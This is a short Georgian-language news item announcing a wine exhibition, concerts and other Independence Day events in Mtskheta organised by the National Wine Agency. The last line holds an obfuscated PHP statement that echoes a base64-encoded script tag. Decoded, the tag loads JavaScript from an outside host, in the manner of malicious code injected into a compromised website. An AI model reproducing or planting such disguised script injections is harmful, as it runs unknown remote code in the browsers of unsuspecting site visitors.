celsiusi
ავერსი საქკაბელი

საქართველოს დამოუკიდებლობის დღისადმი მიძღვნილი საზეიმო ღონისძიებების ფარგლებში, გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს სსიპ ღვინის ეროვნული სააგენტო ქალაქ მცხეთაში წარმოდგენილია კონცეფციით - „საქართველო ღვინის სამშობლო“.

ღონისძიებაში 10-მდე ადგილობრივი ღვინის მწარმოებელი მონაწილეობს; წარმოდგენილი იქნება ქართული ღვინისა და ვაზის კულტურის ისტორიასა და ტრადიციებთან დაკავშირებული ვიზუალური და საინფორმაციო მასალა, მათ შორის, ქართლის რეგიონის ღვინისა და ვაზის ჯიშების მრავალფეროვნება; მოეწყობა ე.წ. „სომელიეს კუთხე“, სადაც კონკურსის „საუკეთესო სომელიე 2021“-ის გამარჯვებული ჯაბა ძიმისტარაშვილი პროფესიულ დეგუსტაციას გამართავს.

ქალაქის ცენტრში მოწყობილ მოედანზე მთელი დღის განმავლობაში ჩატარდება ქართული ღვინის გამოფენა-გაყიდვა; ბავშვებისთვის მოეწყობა გასართობ-შემეცნებითი სივრცე, გაიმართება საბავშვო და ადგილობრივი ფოლკლორული ანსამბლების კონცერტები; ღონისძიების ფარგლებში, სამხედრო ტექნიკის გამოფენის დათვალიერება იქნება შესაძლებელი

17.10 საათზე აფხაზეთის კაპელა შეასრულებს საქართველოს ჰიმნს.

ღონისძიება დღის ბოლოს გალა-კონცერტით დასრულდება.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტრო 26 მაისისადმი მიძღვნილ ღონისძიებებს მცხეთაში, ზუგდიდში და ოზურგეთში წარმოადგენს.

149
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");